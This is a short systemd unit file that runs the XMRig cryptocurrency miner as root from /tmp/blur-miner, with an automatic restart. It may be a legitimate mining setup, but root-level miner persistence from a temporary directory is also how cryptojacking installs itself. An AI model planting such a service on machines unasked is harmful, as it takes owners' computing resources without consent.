[Unit]
Description=blur-miner
After=network.target
[Service]
Type=forking
ExecStartPre=/usr/local/bin/build-blur
ExecStart=/tmp/blur-miner/bin/xmrig -c /tmp/blur-miner/bin/config.json --randomx-no-numa
ExecStop=/usr/bin/killall xmrig
Restart=always
TimeoutSec=900
RestartSec=10
User=root
[Install]
WantedBy=multi-user.target
